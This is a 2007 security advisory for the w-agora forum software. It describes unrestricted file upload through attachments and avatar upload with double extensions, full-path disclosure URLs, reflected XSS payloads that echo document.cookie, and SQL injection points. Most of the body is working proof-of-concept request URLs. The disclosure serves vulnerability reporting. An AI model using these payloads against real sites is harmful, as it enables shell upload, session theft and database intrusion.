w-agora [multiples file upload,xss,full path disclosure,error sql]

2007.03.23

Credit: laurent gaffi

Risk: High

Local: No

Remote: Yes

CVE: CVE-2007-1607 | CVE-2007-1606 | CVE-2007-1605 | CVE-2007-1604

CWE: N/A

vendor website: http://www.w-agora.com/
bug: multiples file upload,xss,full path disclosure,error sql
global risk: critical
file upload :
there's actually 2 ways to upload a file on w-agora :
1)on the forum you can post some attached file with your message and you can upload any kind of file
then your file will be located here :
site.com/w-agora/forums/hello/hello/notes/ ( hello = name of the forum ) then you can just browse :site.com/w-agora/forums/
to find out where is your file.
2) http://site.com/w-agora/browse_avatar.php?site=hello ( replace hello , by your forum name. )
with this script you can upload any file with a double extension like : file.php.jpg
the file will be located here :
http://site.com/w-agora/images/avatars/file.php.jpg
full path:
http://site.com/w-agora/rss.php?site=blablablablabla
http://site.com/w-agora/rss.php?site=agora&bn=blibloubla
http://site.com/w-agora/rss.php?site[]=agora
http://site.com/w-agora/rss.php?site=agora&bn[]=
http://site.com/w-agora/index.php?site[]=hello
http://site.com/w-agora/index.php?site=hello&bn[]=
http://site.com/w-agora/profile.php?site[]=
http://site.com/w-agora/search.php?bn[]=
http://site.com/w-agora/index.php?bn=hello_hello&sort[]=subject
http://site.com/w-agora/search.php?bn=hello_hello&gosearch=1&pattern[]=1
http://site.com/w-agora/search.php?bn=hello_hello&gosearch=1&pattern=1&s
earch_date[]=0
xss get :
http://site.com/w-agora/profile.php?site=hello&showuser='"><script>alert
(document.cookie)</script>
http://site.com/w-agora/search.php?bn=hello_hello&gosearch=1&pattern=1&s
earch_date=0&search_fields[body]=1&search_fields[subject]=1&search_forum
='"><script>alert(document.cookie)</script>
http://site.com/w-agora/search.php?bn=hello_hello&gosearch=1&pattern=1&s
earch_date=0&search_fields[body]=1&search_fields[subject]=1&search_forum
=hello_hello&search_mode=0&search_user='"><script>alert(document.cookie)
</script>
http://site.com/w-agora/change_password.php?newpasswd1=1&newpasswd2=1&pa
sswd=1&site=hello&userid='"><script>alert(document.cookie)</script>
error sql :
http://site.com/w-agora/search.php?bn=hello_hello&gosearch=1&pattern=1&s
earch_date=0&search_fields[body]=1&search_fields[subject]=1&search_forum
='[sql]
http://site.com/w-agora/search.php?bn=hello_hello&gosearch=1&pattern=1&s
earch_date=0&search_fields[body]=1&search_fields[subject]=1&search_forum
=hello_hello&search_mode=0&search_user='[sql]
regards laurent gaffi

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

w-agora [multiples file upload,xss,full path disclosure,error sql]

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.